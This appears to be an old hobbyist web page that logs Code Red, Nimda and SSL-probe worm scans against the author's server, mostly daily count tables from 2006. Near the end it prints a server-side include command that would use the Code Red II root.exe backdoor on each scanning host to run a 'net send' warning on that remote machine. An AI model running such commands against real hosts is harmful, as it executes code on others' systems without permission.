Code Red Attacks ?!
Hm it is time to protect your webserver with either the patch or install a
real OS and WEB server
Please think of the others !
| Local system date | Thursday, 29-Jul-2010 21:18:08 CEST |
| Browser you are using | CCBot/1.0 (+http://www.commoncrawl.org/bot.html) |
| IP number you use | 38.107.191.94 |
| Origin | (none) |
| Hits before you |  |

Last few code red users :
Last few nimda infected users :
Opening the log file at Tuesday 10 October 2006 23:30:01
CODE RED (new version)
-- date --- count
-------------------
summary: 0
CODE RED (old version)
-- date --- count
-------------------
summary: 0
NIMDA Virus attack !
-- date --- count
-------------------
summary: 0
SUMTHIN SSL probe !
-- date --- count
13/Apr/2006 1
01/Aug/2006 1
02/Aug/2006 1
04/Aug/2006 1
06/Aug/2006 1
08/Aug/2006 1
15/Aug/2006 1
17/Aug/2006 3
26/Aug/2006 1
05/Jul/2006 1
11/Jul/2006 1
23/Jul/2006 1
26/Jul/2006 1
12/Jun/2006 1
11/May/2006 2
24/May/2006 1
01/Sep/2006 1
05/Sep/2006 1
06/Sep/2006 1
19/Sep/2006 2
27/Sep/2006 1
-------------------
summary: 25
IE6 XP Office !
-- date --- count
05/Apr/2006 2
06/Apr/2006 1
07/Apr/2006 3
08/Apr/2006 1
09/Apr/2006 1
10/Apr/2006 1
11/Apr/2006 1
12/Apr/2006 1
13/Apr/2006 2
14/Apr/2006 1
15/Apr/2006 1
16/Apr/2006 3
17/Apr/2006 1
18/Apr/2006 1
19/Apr/2006 1
20/Apr/2006 2
21/Apr/2006 2
22/Apr/2006 6
23/Apr/2006 1
24/Apr/2006 1
25/Apr/2006 2
26/Apr/2006 1
27/Apr/2006 1
28/Apr/2006 1
29/Apr/2006 1
30/Apr/2006 1
01/Aug/2006 1
02/Aug/2006 1
03/Aug/2006 1
04/Aug/2006 1
05/Aug/2006 1
06/Aug/2006 2
07/Aug/2006 1
08/Aug/2006 2
09/Aug/2006 1
10/Aug/2006 1
11/Aug/2006 3
12/Aug/2006 1
13/Aug/2006 1
14/Aug/2006 1
15/Aug/2006 2
16/Aug/2006 7
17/Aug/2006 2
18/Aug/2006 4
19/Aug/2006 4
20/Aug/2006 4
21/Aug/2006 1
22/Aug/2006 3
23/Aug/2006 1
24/Aug/2006 1
25/Aug/2006 2
26/Aug/2006 1
27/Aug/2006 1
28/Aug/2006 1
29/Aug/2006 1
30/Aug/2006 1
31/Aug/2006 1
01/Jul/2006 1
02/Jul/2006 1
03/Jul/2006 1
04/Jul/2006 1
05/Jul/2006 4
06/Jul/2006 1
07/Jul/2006 1
08/Jul/2006 1
09/Jul/2006 2
10/Jul/2006 1
11/Jul/2006 2
12/Jul/2006 2
13/Jul/2006 1
14/Jul/2006 2
15/Jul/2006 6
16/Jul/2006 2
17/Jul/2006 2
18/Jul/2006 3
19/Jul/2006 1
20/Jul/2006 1
21/Jul/2006 1
22/Jul/2006 1
23/Jul/2006 1
24/Jul/2006 2
25/Jul/2006 1
26/Jul/2006 1
27/Jul/2006 2
28/Jul/2006 1
29/Jul/2006 1
30/Jul/2006 1
31/Jul/2006 3
01/Jun/2006 1
02/Jun/2006 1
03/Jun/2006 1
04/Jun/2006 1
05/Jun/2006 1
06/Jun/2006 1
07/Jun/2006 3
08/Jun/2006 2
09/Jun/2006 1
10/Jun/2006 1
11/Jun/2006 2
12/Jun/2006 2
13/Jun/2006 1
14/Jun/2006 3
15/Jun/2006 3
16/Jun/2006 2
17/Jun/2006 1
18/Jun/2006 1
19/Jun/2006 1
20/Jun/2006 1
21/Jun/2006 1
22/Jun/2006 2
23/Jun/2006 1
24/Jun/2006 1
25/Jun/2006 1
26/Jun/2006 1
27/Jun/2006 1
28/Jun/2006 1
29/Jun/2006 1
30/Jun/2006 1
01/May/2006 1
02/May/2006 1
03/May/2006 2
04/May/2006 2
05/May/2006 1
06/May/2006 1
07/May/2006 1
08/May/2006 1
09/May/2006 3
10/May/2006 2
11/May/2006 1
12/May/2006 1
13/May/2006 1
14/May/2006 1
15/May/2006 2
16/May/2006 1
17/May/2006 1
18/May/2006 3
19/May/2006 1
20/May/2006 1
21/May/2006 2
22/May/2006 2
23/May/2006 1
24/May/2006 1
25/May/2006 2
26/May/2006 1
27/May/2006 2
28/May/2006 2
29/May/2006 2
30/May/2006 2
31/May/2006 1
01/Oct/2006 1
02/Oct/2006 1
03/Oct/2006 4
04/Oct/2006 4
05/Oct/2006 1
06/Oct/2006 2
07/Oct/2006 1
08/Oct/2006 1
09/Oct/2006 1
10/Oct/2006 1
01/Sep/2006 4
02/Sep/2006 1
03/Sep/2006 1
04/Sep/2006 1
05/Sep/2006 3
06/Sep/2006 1
07/Sep/2006 1
08/Sep/2006 1
09/Sep/2006 1
10/Sep/2006 1
11/Sep/2006 3
12/Sep/2006 1
13/Sep/2006 1
14/Sep/2006 3
15/Sep/2006 1
16/Sep/2006 2
17/Sep/2006 2
18/Sep/2006 2
19/Sep/2006 1
20/Sep/2006 6
21/Sep/2006 1
22/Sep/2006 1
23/Sep/2006 1
24/Sep/2006 1
25/Sep/2006 2
26/Sep/2006 1
27/Sep/2006 1
28/Sep/2006 2
29/Sep/2006 1
30/Sep/2006 1
-------------------
summary: 299
Ready at 23:32:21 so computing took 2 Minutes and 20 seconds
Now we could execute :
<--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+have+a+security+hole+so+big+that+you+can+drive+a+Mack+truck+through+it.+You+should+fix+it+before+some+script+kiddie+comes+along+and+takes+advantage+of+it.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live,+though+c:%5Cinetpub%5Cscripts+is+the+default+location\).%22"-->
On the above mentioned servers....oeps.....
Old list from upto 28 Sept 2001
Old list from upto 01 June 2002
Old list from upto 01 july 2003